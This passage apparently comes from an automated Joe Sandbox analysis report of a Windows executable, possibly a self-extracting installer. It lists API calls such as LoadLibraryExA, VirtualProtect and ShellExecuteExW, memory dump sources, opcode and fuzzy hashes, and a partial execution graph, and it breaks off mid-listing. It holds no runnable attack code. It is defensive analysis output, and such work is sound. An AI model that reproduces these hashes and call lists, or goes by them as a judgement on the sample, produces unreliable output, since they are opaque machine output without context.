                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: FileHandleType
                                                        • String ID: @
                                                        • API String ID: 3000768030-2766056989
                                                        • Opcode ID: b947de3923641d317ef8b4e62e77dc8d20735a47ca9ba61dc4d579ac66c9413a
                                                        • Instruction ID: 3b4d7f00c35b37004f34df21c38faa10522621fd5f986de32b8e3f29e0202deb
                                                        • Opcode Fuzzy Hash: b947de3923641d317ef8b4e62e77dc8d20735a47ca9ba61dc4d579ac66c9413a
                                                        • Instruction Fuzzy Hash: 7221A222B0864292FB649F26D8D4139B660FB45B74FA80735D7BE477D4CE3DD881C290
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D87808 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F4D857AE), ref: 00007FF7F4D8784C
                                                        • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F4D857AE), ref: 00007FF7F4D87892
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 13556f5c8cc8e57bd0135833ed3cb94125f61d8ee28d70f1e7400c7c27568873
                                                        • Instruction ID: a5031123363bdad0e9ad133830b2fdf2b5db14593a370eaa170d3e32a909f98f
                                                        • Opcode Fuzzy Hash: 13556f5c8cc8e57bd0135833ed3cb94125f61d8ee28d70f1e7400c7c27568873
                                                        • Instruction Fuzzy Hash: 5A115132608B8983EB109F16F880269B7A5FB88B88F984230DF9D07798DF3CD551CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D6A83C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: FindHandleModuleResource
                                                        • String ID: RTL
                                                        • API String ID: 3537982541-834975271
                                                        • Opcode ID: a45610fe9d42f5f181feef3a06741817b69cf11aeaebfa57cd0cb73b5dfd576c
                                                        • Instruction ID: 46708fc4906a45428b9332708255fdcfccde2087c3a9c118160af8f067e73394
                                                        • Opcode Fuzzy Hash: a45610fe9d42f5f181feef3a06741817b69cf11aeaebfa57cd0cb73b5dfd576c
                                                        • Instruction Fuzzy Hash: BDD01251F0660A93FF19AF63D88537466506B19B41F891038CA2D463D0EE6D909487A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:9.5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:2.7%
                                                        Total number of Nodes:1505
                                                        Total number of Limit Nodes:44
                                                        execution_graph 23417 d510d5 23422 d55abd 23417->23422 23423 d55ac7 __EH_prolog 23422->23423 23429 d5b505 23423->23429 23425 d55ad3 23435 d55cac GetCurrentProcess GetProcessAffinityMask 23425->23435 23430 d5b50f __EH_prolog 23429->23430 23436 d5f1d0 82 API calls 23430->23436 23432 d5b521 23437 d5b61e 23432->23437 23436->23432 23438 d5b630 _abort 23437->23438 23441 d610dc 23438->23441 23444 d6109e GetCurrentProcess GetProcessAffinityMask 23441->23444 23445 d5b597 23444->23445 23445->23425 23446 d6e2d7 23447 d6e1db 23446->23447 23449 d6e85d 23447->23449 23475 d6e5bb 23449->23475 23451 d6e86d 23452 d6e8ca 23451->23452 23455 d6e8ee 23451->23455 23453 d6e7fb DloadReleaseSectionWriteAccess 6 API calls 23452->23453 23454 d6e8d5 RaiseException 23453->23454 23456 d6eac3 23454->23456 23457 d6e966 LoadLibraryExA 23455->23457 23458 d6e9c7 23455->23458 23464 d6e9d9 23455->23464 23470 d6ea95 23455->23470 23456->23447 23457->23458 23459 d6e979 GetLastError 23457->23459 23460 d6e9d2 FreeLibrary 23458->23460 23458->23464 23461 d6e9a2 23459->23461 23462 d6e98c 23459->23462 23460->23464 23465 d6e7fb DloadReleaseSectionWriteAccess 6 API calls 23461->23465 23462->23458 23462->23461 23463 d6ea37 GetProcAddress 23466 d6ea47 GetLastError 23463->23466 23463->23470 23464->23463 23464->23470 23467 d6e9ad RaiseException 23465->23467 23468 d6ea5a 23466->23468 23467->23456 23468->23470 23471 d6e7fb DloadReleaseSectionWriteAccess 6 API calls 23468->23471 23484 d6e7fb 23470->23484 23472 d6ea7b RaiseException 23471->23472 23473 d6e5bb ___delayLoadHelper2@8 6 API calls 23472->23473 23474 d6ea92 23473->23474 23474->23470 23476 d6e5c7 23475->23476 23477 d6e5ed 23475->23477 23492 d6e664 23476->23492 23477->23451 23479 d6e5cc 23480 d6e5e8 23479->23480 23495 d6e78d 23479->23495 23500 d6e5ee GetModuleHandleW GetProcAddress GetProcAddress 23480->23500 23483 d6e836 23483->23451 23485 d6e82f 23484->23485 23486 d6e80d 23484->23486 23485->23456 23487 d6e664 DloadReleaseSectionWriteAccess 3 API calls 23486->23487 23488 d6e812 23487->23488 23489 d6e82a 23488->23489 23490 d6e78d DloadProtectSection 3 API calls 23488->23490 23503 d6e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23489->23503 23490->23489 23501 d6e5ee GetModuleHandleW GetProcAddress GetProcAddress 23492->23501 23494 d6e669 23494->23479 23496 d6e7a2 DloadProtectSection 23495->23496 23497 d6e7a8 23496->23497 23498 d6e7dd VirtualProtect 23496->23498 23502 d6e6a3 VirtualQuery GetSystemInfo 23496->23502 23497->23480 23498->23497 23500->23483 23501->23494 23502->23498 23503->23485 25349 d6f4d3 20 API calls 23507 d6e1d1 14 API calls ___delayLoadHelper2@8 25426 d7a3d0 21 API calls 2 library calls 25427 d82bd0 VariantClear 25412 d70ada 51 API calls 2 library calls 23709 d6dec2 23710 d6decf 23709->23710 23717 d5e617 23710->23717 23713 d54092 _swprintf 51 API calls 23714 d6def1 SetDlgItemTextW 23713->23714 23721 d6b568 PeekMessageW 23714->23721 23718 d5e627 23717->23718 23726 d5e648 23718->23726 23722 d6b583 GetMessageW 23721->23722 23723 d6b5bc 23721->23723 23724 d6b5a8 TranslateMessage DispatchMessageW 23722->23724 23725 d6b599 IsDialogMessageW 23722->23725 23724->23723 23725->23723 23725->23724 23732 d5d9b0 23726->23732 23729 d5e645 23729->23713 23730 d5e66b LoadStringW 23730->23729 23731 d5e682 LoadStringW 23730->23731 23731->23729 23737 d5d8ec 23732->23737 23734 d5d9cd 23735 d5d9e2 23734->23735 23745 d5d9f0 26 API calls 23734->23745 23735->23729 23735->23730 23738 d5d904 23737->23738 23739 d5d984 _strncpy 23737->23739 23741 d5d928 23738->23741 23746 d61da7 WideCharToMultiByte 23738->23746 23739->23734 23744 d5d959 23741->23744 23747 d5e5b1 50 API calls __vsnprintf 23741->23747 23748 d76159 26 API calls 3 library calls 23744->23748 23745->23735 23746->23741 23747->23744 23748->23739 25386 d6b5c0 100 API calls 25428 d677c0 118 API calls 25429 d6ffc0 RaiseException _com_raise_error _com_error::_com_error 25414 d662ca 123 API calls __InternalCxxFrameHandler 25387 d595f0 80 API calls 25415 d55ef0 82 API calls 23779 d798f0 23787 d7adaf 23779->23787 23782 d79904 23784 d7990c 23785 d79919 23784->23785 23795 d79920 11 API calls 23784->23795 23796 d7ac98 23787->23796 23790 d7adee TlsAlloc 23791 d7addf 23790->23791 23792 d6fbbc _ValidateLocalCookies 5 API calls 23791->23792 23793 d798fa 23792->23793 23793->23782 23794 d79869 20 API calls 2 library calls 23793->23794 23794->23784 23795->23782 23799 d7acc4 23796->23799 23801 d7acc8 23796->23801 23797 d7ace8 23800 d7acf4 GetProcAddress 23797->23800 23797->23801 23799->23797 23799->23801 23803 d7ad34 23799->23803 23802 d7ad04 _abort 23800->23802 23801->23790 23801->23791 23802->23801 23804 d7ad55 LoadLibraryExW 23803->23804 23805 d7ad4a 23803->23805 23806 d7ad72 GetLastError 23804->23806 23809 d7ad8a 23804->23809 23805->23799 23808 d7ad7d LoadLibraryExW 23806->23808 23806->23809 23807 d7ada1 FreeLibrary 23807->23805 23808->23809 23809->23805 23809->23807 23810 d7abf0 23813 d7abfb 23810->23813 23812 d7ac24 23823 d7ac50 DeleteCriticalSection 23812->23823 23813->23812 23814 d7ac20 23813->23814 23816 d7af0a 23813->23816 23817 d7ac98 _abort 5 API calls 23816->23817 23818 d7af31 23817->23818 23819 d7af4f InitializeCriticalSectionAndSpinCount 23818->23819 23820 d7af3a 23818->23820 23819->23820 23821 d6fbbc _ValidateLocalCookies 5 API calls 23820->23821 23822 d7af66 23821->23822 23822->23813 23823->23814 25352 d788f0 7 API calls ___scrt_uninitialize_crt 25389 d6fd4f 9 API calls 2 library calls 25353 d72cfb 38 API calls 4 library calls 23838 d6eae7 23839 d6eaf1 23838->23839 23840 d6e85d ___delayLoadHelper2@8 14 API calls 23839->23840 23841 d6eafe 23840->23841 25354 d6f4e7 29 API calls _abort 23843 d513e1 84 API calls 2 library calls 23844 d6b7e0 23845 d6b7ea __EH_prolog 23844->23845 24012 d51316 23845->24012 23848 d6b841 23849 d6bf0f 24084 d6d69e 23849->24084 23850 d6b82a 23850->23848 23852 d6b89b 23850->23852 23853 d6b838 23850->23853 23857 d6b92e GetDlgItemTextW 23852->23857 23863 d6b8b1 23852->23863 23858 d6b83c 23853->23858 23859 d6b878 23853->23859 23855 d6bf2a SendMessageW 23856 d6bf38 23855->23856 23860 d6bf52 GetDlgItem SendMessageW 23856->23860 23861 d6bf41 SendDlgItemMessageW 23856->23861 23857->23859 23862 d6b96b 23857->23862 23858->23848 23864 d5e617 53 API calls 23858->23864 23859->23848 23866 d6b95f EndDialog 23859->23866 24102 d6a64d GetCurrentDirectoryW 23860->24102 23861->23860 23867 d6b980 GetDlgItem 23862->23867 24009 d6b974 23862->24009 23868 d5e617 53 API calls 23863->23868 23869 d6b85b 23864->23869 23866->23848 23871 d6b9b7 SetFocus 23867->23871 23872 d6b994 SendMessageW SendMessageW 23867->23872 23873 d6b8ce SetDlgItemTextW 23868->23873 24124 d5124f SHGetMalloc 23869->24124 23870 d6bf82 GetDlgItem 23875 d6bfa5 SetWindowTextW 23870->23875 23876 d6bf9f 23870->23876 23877 d6b9c7 23871->23877 23890 d6b9e0 23871->23890 23872->23871 23878 d6b8d9 23873->23878 24103 d6abab GetClassNameW 23875->24103 23876->23875 23882 d5e617 53 API calls 23877->23882 23878->23848 23886 d6b8e6 GetMessageW 23878->23886 23879 d6b862 23879->23848 23889 d6c1fc SetDlgItemTextW 23879->23889 23880 d6be55 23884 d5e617 53 API calls 23880->23884 23883 d6b9d1 23882->23883 24125 d6d4d4 23883->24125 23891 d6be65 SetDlgItemTextW 23884->23891 23886->23848 23887 d6b8fd IsDialogMessageW 23886->23887 23887->23878 23893 d6b90c TranslateMessage DispatchMessageW 23887->23893 23889->23848 23897 d5e617 53 API calls 23890->23897 23895 d6be79 23891->23895 23893->23878 23894 d6b9d9 24022 d5a0b1 23894->24022 23899 d5e617 53 API calls 23895->23899 23898 d6ba17 23897->23898 23903 d54092 _swprintf 51 API calls 23898->23903 23930 d6be9c _wcslen 23899->23930 23901 d6c020 23911 d6c73f 97 API calls 23901->23911 23954 d6c0d8 23901->23954 23902 d6bff0 23902->23901 23906 d5e617 53 API calls 23902->23906 23907 d6ba29 23903->23907 23904 d6c73f 97 API calls 23904->23902 23910 d6c003 SetDlgItemTextW 23906->23910 23913 d6d4d4 16 API calls 23907->23913 23908 d6ba73 24028 d6ac04 SetCurrentDirectoryW 23908->24028 23909 d6ba68 GetLastError 23909->23908 23915 d5e617 53 API calls 23910->23915 23917 d6c03b 23911->23917 23912 d6c18b 23918 d6c194 EnableWindow 23912->23918 23919 d6c19d 23912->23919 23913->23894 23914 d6beed 23923 d5e617 53 API calls 23914->23923 23921 d6c017 SetDlgItemTextW 23915->23921 23929 d6c04d 23917->23929 23951 d6c072 23917->23951 23918->23919 23920 d6c1ba 23919->23920 24143 d512d3 GetDlgItem EnableWindow 23919->24143 23926 d6c1e1 23920->23926 23936 d6c1d9 SendMessageW 23920->23936 23921->23901 23922 d6ba87 23927 d6ba90 GetLastError 23922->23927 23928 d6ba9e 23922->23928 23923->23848 23924 d6c0cb 23932 d6c73f 97 API calls 23924->23932 23926->23848 23937 d5e617 53 API calls 23926->23937 23927->23928 23933 d6bb11 23928->23933 23938 d6baae GetTickCount 23928->23938 23939 d6bb20 23928->23939 24141 d69ed5 32 API calls 23929->24141 23930->23914 23940 d5e617 53 API calls 23930->23940 23931 d6c1b0 24144 d512d3 GetDlgItem EnableWindow 23931->24144 23932->23954 23933->23939 23941 d6bd56 23933->23941 23936->23926 23937->23879 23944 d54092 _swprintf 51 API calls 23938->23944 23947 d6bcfb 23939->23947 23948 d6bcf1 23939->23948 23949 d6bb39 GetModuleFileNameW 23939->23949 23945 d6bed0 23940->23945 24044 d512f1 GetDlgItem ShowWindow 23941->24044 23942 d6c066 23942->23951 23953 d6bac7 23944->23953 23955 d54092 _swprintf 51 API calls 23945->23955 23946 d6c169 24142 d69ed5 32 API calls 23946->24142 23950 d5e617 53 API calls 23947->23950 23948->23859 23948->23947 24135 d5f28c 82 API calls 23949->24135 23958 d6bd05 23950->23958 23951->23924 23959 d6c73f 97 API calls 23951->23959 23952 d6bd66 24045 d512f1 GetDlgItem ShowWindow 23952->24045 24029 d5966e 23953->24029 23954->23912 23954->23946 23961 d5e617 53 API calls 23954->23961 23955->23914 23964 d54092 _swprintf 51 API calls 23958->23964 23965 d6c0a0 23959->23965 23961->23954 23962 d6c188 23962->23912 23963 d6bb5f 23967 d54092 _swprintf 51 API calls 23963->23967 23969 d6bd23 23964->23969 23965->23924 23970 d6c0a9 DialogBoxParamW 23965->23970 23966 d6bd70 23971 d5e617 53 API calls 23966->23971 23968 d6bb81 CreateFileMappingW 23967->23968 23973 d6bbe3 GetCommandLineW 23968->23973 24004 d6bc60 __InternalCxxFrameHandler 23968->24004 23982 d5e617 53 API calls 23969->23982 23970->23859 23970->23924 23974 d6bd7a SetDlgItemTextW 23971->23974 23976 d6bbf4 23973->23976 24046 d512f1 GetDlgItem ShowWindow 23974->24046 23975 d6baed 23979 d6baf4 GetLastError 23975->23979 23980 d6baff 23975->23980 24136 d6b425 SHGetMalloc 23976->24136 23977 d6bc6b ShellExecuteExW 24002 d6bc88 23977->24002 23979->23980 24037 d5959a 23980->24037 23986 d6bd3d 23982->23986 23983 d6bd8c SetDlgItemTextW GetDlgItem 23987 d6bdc1 23983->23987 23988 d6bda9 GetWindowLongW SetWindowLongW 23983->23988 23985 d6bc10 24137 d6b425 SHGetMalloc 23985->24137 24047 d6c73f 23987->24047 23988->23987 23991 d6bc1c 24138 d6b425 SHGetMalloc 23991->24138 23994 d6bccb 23994->23948 24000 d6bce1 UnmapViewOfFile CloseHandle 23994->24000 23995 d6c73f 97 API calls 23997 d6bddd 23995->23997 23996 d6bc28 24139 d5f3fa 82 API calls 2 library calls 23996->24139 24072 d6da52 23997->24072 24000->23948 24001 d6bc3f MapViewOfFile 24001->24004 24002->23994 24005 d6bcb7 Sleep 24002->24005 24004->23977 24005->23994 24005->24002 24006 d6c73f 97 API calls 24010 d6be03 24006->24010 24007 d6be2c 24140 d512d3 GetDlgItem EnableWindow 24007->24140 24009->23859 24009->23880 24010->24007 24011 d6c73f 97 API calls 24010->24011 24011->24007 24013 d5131f 24012->24013 24014 d51378 24012->24014 24015 d51385 24013->24015 24145 d5e2e8 62 API calls 2 library calls 24013->24145 24146 d5e2c1 GetWindowLongW SetWindowLongW 24014->24146 24015->23848 24015->23849 24015->23850 24018 d51341 24018->24015 24019 d51354 GetDlgItem 24018->24019 24019->24015 24020 d51364 24019->24020 24020->24015 24021 d5136a SetWindowTextW 24020->24021 24021->24015 24026 d5a0bb 24022->24026 24023 d5a175 24023->23908 24023->23909 24024 d5a14c 24024->24023 24025 d5a2b2 8 API calls 24024->24025 24025->24023 24026->24023 24026->24024 24147 d5a2b2 24026->24147 24028->23922 24030 d59678 24029->24030 24031 d596d5 CreateFileW 24030->24031 24032 d596c9 24030->24032 24031->24032 24033 d5971f 24032->24033 24034 d5bb03 GetCurrentDirectoryW 24032->24034 24033->23975 24035 d59704 24034->24035 24035->24033 24036 d59708 CreateFileW 24035->24036 24036->24033 24038 d595be 24037->24038 24043 d595cf 24037->24043 24039 d595d1 24038->24039 24040 d595ca 24038->24040 24038->24043 24173 d59620 24039->24173 24168 d5974e 24040->24168 24043->23933 24044->23952 24045->23966 24046->23983 24048 d6c749 __EH_prolog 24047->24048 24049 d6bdcf 24048->24049 24050 d6b314 ExpandEnvironmentStringsW 24048->24050 24049->23995 24062 d6c780 _wcslen _wcsrchr 24050->24062 24052 d6b314 ExpandEnvironmentStringsW 24052->24062 24053 d6ca67 SetWindowTextW 24053->24062 24056 d73e3e 22 API calls 24056->24062 24058 d6c855 SetFileAttributesW 24059 d6c90f GetFileAttributesW 24058->24059 24071 d6c86f _abort _wcslen 24058->24071 24059->24062 24063 d6c921 DeleteFileW 24059->24063 24062->24049 24062->24052 24062->24053 24062->24056 24062->24058 24064 d6cc31 GetDlgItem SetWindowTextW SendMessageW 24062->24064 24067 d6cc71 SendMessageW 24062->24067 24188 d61fbb CompareStringW 24062->24188 24189 d6a64d GetCurrentDirectoryW 24062->24189 24191 d5a5d1 6 API calls 24062->24191 24192 d5a55a FindClose 24062->24192 24193 d6b48e 76 API calls 2 library calls 24062->24193 24063->24062 24065 d6c932 24063->24065 24064->24062 24066 d54092 _swprintf 51 API calls 24065->24066 24068 d6c952 GetFileAttributesW 24066->24068 24067->24062 24068->24065 24069 d6c967 MoveFileW 24068->24069 24069->24062 24070 d6c97f MoveFileExW 24069->24070 24070->24062 24071->24059 24071->24062 24190 d5b991 51 API calls 2 library calls 24071->24190 24073 d6da5c __EH_prolog 24072->24073 24194 d60659 24073->24194 24075 d6da8d 24198 d55b3d 24075->24198 24077 d6daab 24202 d57b0d 24077->24202 24081 d6dafe 24218 d57b9e 24081->24218 24083 d6bdee 24083->24006 24085 d6d6a8 24084->24085 24691 d6a5c6 24085->24691 24088 d6bf15 24088->23855 24088->23856 24089 d6d6b5 GetWindow 24089->24088 24092 d6d6d5 24089->24092 24090 d6d6e2 GetClassNameW 24696 d61fbb CompareStringW 24090->24696 24092->24088 24092->24090 24093 d6d706 GetWindowLongW 24092->24093 24094 d6d76a GetWindow 24092->24094 24093->24094 24095 d6d716 SendMessageW 24093->24095 24094->24088 24094->24092 24095->24094 24096 d6d72c GetObjectW 24095->24096 24697 d6a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24096->24697 24098 d6d743 24698 d6a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24098->24698 24699 d6a80c 8 API calls 24098->24699 24101 d6d754 SendMessageW DeleteObject 24101->24094 24102->23870 24104 d6abf1 24103->24104 24105 d6abcc 24103->24105 24106 d6abf6 SHAutoComplete 24104->24106 24107 d6abff 24104->24107 24702 d61fbb CompareStringW 24105->24702 24106->24107 24111 d6b093 24107->24111 24109 d6abdf 24109->24104 24110 d6abe3 FindWindowExW 24109->24110 24110->24104 24112 d6b09d __EH_prolog 24111->24112 24113 d513dc 84 API calls 24112->24113 24114 d6b0bf 24113->24114 24703 d51fdc 24114->24703 24117 d6b0eb 24120 d519af 128 API calls 24117->24120 24118 d6b0d9 24119 d51692 86 API calls 24118->24119 24121 d6b0e4 24119->24121 24123 d6b10d __InternalCxxFrameHandler ___std_exception_copy 24120->24123 24121->23902 24121->23904 24122 d51692 86 API calls 24122->24121 24123->24122 24124->23879 24126 d6b568 5 API calls 24125->24126 24127 d6d4e0 GetDlgItem 24126->24127 24128 d6d536 SendMessageW SendMessageW 24127->24128 24129 d6d502 24127->24129 24130 d6d572 24128->24130 24131 d6d591 SendMessageW SendMessageW SendMessageW 24128->24131 24132 d6d50d ShowWindow SendMessageW SendMessageW 24129->24132 24130->24131 24133 d6d5e7 SendMessageW 24131->24133 24134 d6d5c4 SendMessageW 24131->24134 24132->24128 24133->23894 24134->24133 24135->23963 24136->23985 24137->23991 24138->23996 24139->24001 24140->24009 24141->23942 24142->23962 24143->23931 24144->23920 24145->24018 24146->24015 24148 d5a2bf 24147->24148 24149 d5a2e3 24148->24149 24150 d5a2d6 CreateDirectoryW 24148->24150 24151 d5a231 3 API calls 24149->24151 24150->24149 24152 d5a316 24150->24152 24153 d5a2e9 24151->24153 24156 d5a325 24152->24156 24160 d5a4ed 24152->24160 24154 d5a329 GetLastError 24153->24154 24157 d5bb03 GetCurrentDirectoryW 24153->24157 24154->24156 24156->24026 24158 d5a2ff 24157->24158 24158->24154 24159 d5a303 CreateDirectoryW 24158->24159 24159->24152 24159->24154 24161 d6ec50 24160->24161 24162 d5a4fa SetFileAttributesW 24161->24162 24163 d5a510 24162->24163 24164 d5a53d 24162->24164 24165 d5bb03 GetCurrentDirectoryW 24163->24165 24164->24156 24166 d5a524 24165->24166 24166->24164 24167 d5a528 SetFileAttributesW 24166->24167 24167->24164 24169 d59781 24168->24169 24172 d59757 24168->24172 24169->24043 24172->24169 24179 d5a1e0 24172->24179 24174 d5962c 24173->24174 24175 d5964a 24173->24175 24174->24175 24177 d59638 FindCloseChangeNotification 24174->24177 24176 d59669 24175->24176 24187 d56bd5 76 API calls 24175->24187 24176->24043 24177->24175 24180 d6ec50 24179->24180 24181 d5a1ed DeleteFileW 24180->24181 24182 d5a200 24181->24182 24183 d5977f 24181->24183 24184 d5bb03 GetCurrentDirectoryW 24182->24184 24183->24043 24185 d5a214 24184->24185 24185->24183 24186 d5a218 DeleteFileW 24185->24186 24186->24183 24187->24176 24188->24062 24189->24062 24190->24071 24191->24062 24192->24062 24193->24062 24195 d60666 _wcslen 24194->24195 24222 d517e9 24195->24222 24197 d6067e 24197->24075 24199 d60659 _wcslen 24198->24199 24200 d517e9 78 API calls 24199->24200 24201 d6067e 24200->24201 24201->24077 24203 d57b17 __EH_prolog 24202->24203 24239 d5ce40 24203->24239 24205 d57b32 24245 d6eb38 24205->24245 24207 d57b5c 24254 d64a76 24207->24254 24210 d57c7d 24211 d57c87 24210->24211 24212 d57cf1 24211->24212 24286 d5a56d 24211->24286 24215 d57d50 24212->24215 24264 d58284 24212->24264 24214 d57d92 24214->24081 24215->24214 24292 d5138b 74 API calls 24215->24292 24219 d57bb3 24218->24219 24220 d57bac 24218->24220 24221 d62297 86 API calls 24220->24221 24221->24219 24223 d517ff 24222->24223 24234 d5185a __InternalCxxFrameHandler 24222->24234 24224 d51828 24223->24224 24235 d56c36 76 API calls __vswprintf_c_l 24223->24235 24226 d51887 24224->24226 24231 d51847 ___std_exception_copy 24224->24231 24228 d73e3e 22 API calls 24226->24228 24227 d5181e 24236 d56ca7 75 API calls 24227->24236 24230 d5188e 24228->24230 24230->24234 24238 d56ca7 75 API calls 24230->24238 24231->24234 24237 d56ca7 75 API calls 24231->24237 24234->24197 24235->24227 24236->24224 24237->24234 24238->24234 24240 d5ce4a __EH_prolog 24239->24240 24241 d6eb38 8 API calls 24240->24241 24242 d5ce8d 24241->24242 24243 d6eb38 8 API calls 24242->24243 24244 d5ceb1 24243->24244 24244->24205 24247 d6eb3d ___std_exception_copy 24245->24247 24246 d6eb57 24246->24207 24247->24246 24250 d6eb59 24247->24250 24260 d77a5e 7 API calls 2 library calls 24247->24260 24249 d6f5c9 24262 d7238d RaiseException 24249->24262 24250->24249 24261 d7238d RaiseException 24250->24261 24252 d6f5e6 24255 d64a80 __EH_prolog 24254->24255 24256 d6eb38 8 API calls 24255->24256 24257 d64a9c 24256->24257 24258 d57b8b 24257->24258 24263 d60e46 80 API calls 24257->24263 24258->24210 24260->24247 24261->24249 24262->24252 24263->24258 24265 d5828e __EH_prolog 24264->24265 24293 d513dc 24265->24293 24267 d582aa 24268 d582bb 24267->24268 24436 d59f42 24267->24436 24272 d582f2 24268->24272 24301 d51a04 24268->24301 24271 d582ee 24271->24272 24283 d5a56d 7 API calls 24271->24283 24285 d58389 24271->24285 24440 d5c0c5 CompareStringW _wcslen 24271->24440 24432 d51692 24272->24432 24278 d583e8 24328 d51f6d 24278->24328 24281 d583f3 24281->24272 24332 d53b2d 24281->24332 24344 d5848e 24281->24344 24283->24271 24320 d58430 24285->24320 24287 d5a582 24286->24287 24288 d5a5b0 24287->24288 24680 d5a69b 24287->24680 24288->24211 24290 d5a592 24290->24288 24291 d5a597 FindClose 24290->24291 24291->24288 24292->24214 24294 d513e1 __EH_prolog 24293->24294 24295 d5ce40 8 API calls 24294->24295 24296 d51419 24295->24296 24297 d6eb38 8 API calls 24296->24297 24300 d51474 _abort 24296->24300 24298 d51461 24297->24298 24299 d5b505 84 API calls 24298->24299 24298->24300 24299->24300 24300->24267 24303 d51a0e __EH_prolog 24301->24303 24302 d51b9b 24302->24271 24303->24302 24315 d51a61 24303->24315 24441 d513ba 24303->24441 24305 d51bc7 24444 d5138b 74 API calls 24305->24444 24308 d53b2d 101 API calls 24312 d51c12 24308->24312 24309 d51bd4 24309->24302 24309->24308 24310 d51c5a 24310->24302 24314 d51c8d 24310->24314 24445 d5138b 74 API calls 24310->24445 24312->24310 24313 d53b2d 101 API calls 24312->24313 24313->24312 24314->24302 24318 d59e80 79 API calls 24314->24318 24315->24302 24315->24305 24315->24309 24316 d53b2d 101 API calls 24317 d51cde 24316->24317 24317->24302 24317->24316 24318->24317 24319 d59e80 79 API calls 24319->24315 24463 d5cf3d 24320->24463 24322 d58440 24467 d613d2 GetSystemTime SystemTimeToFileTime 24322->24467 24324 d583a3 24324->24278 24325 d61b66 24324->24325 24468 d6de6b 24325->24468 24329 d51f72 __EH_prolog 24328->24329 24331 d51fa6 24329->24331 24476 d519af 24329->24476 24331->24281 24333 d53b3d 24332->24333 24334 d53b39 24332->24334 24343 d59e80 79 API calls 24333->24343 24334->24281 24335 d53b4f 24336 d53b78 24335->24336 24337 d53b6a 24335->24337 24607 d5286b 101 API calls 3 library calls 24336->24607 24339 d53baa 24337->24339 24606 d532f7 89 API calls 2 library calls 24337->24606 24339->24281 24341 d53b76 24341->24339 24608 d520d7 74 API calls 24341->24608 24343->24335 24345 d58498 __EH_prolog 24344->24345 24348 d584d5 24345->24348 24355 d58513 24345->24355 24633 d68c8d 103 API calls 24345->24633 24347 d584f5 24349 d5851c 24347->24349 24350 d584fa 24347->24350 24348->24347 24353 d5857a 24348->24353 24348->24355 24349->24355 24635 d68c8d 103 API calls 24349->24635 24350->24355 24634 d57a0d 152 API calls 24350->24634 24353->24355 24609 d55d1a 24353->24609 24355->24281 24356 d58605 24356->24355 24615 d58167 24356->24615 24359 d58797 24360 d5a56d 7 API calls 24359->24360 24363 d58802 24359->24363 24360->24363 24362 d5d051 82 API calls 24364 d5885d 24362->24364 24621 d57c0d 24363->24621 24364->24355 24364->24362 24365 d5898b 24364->24365 24366 d58992 24364->24366 24636 d58117 84 API calls 24364->24636 24637 d52021 74 API calls 24364->24637 24638 d52021 74 API 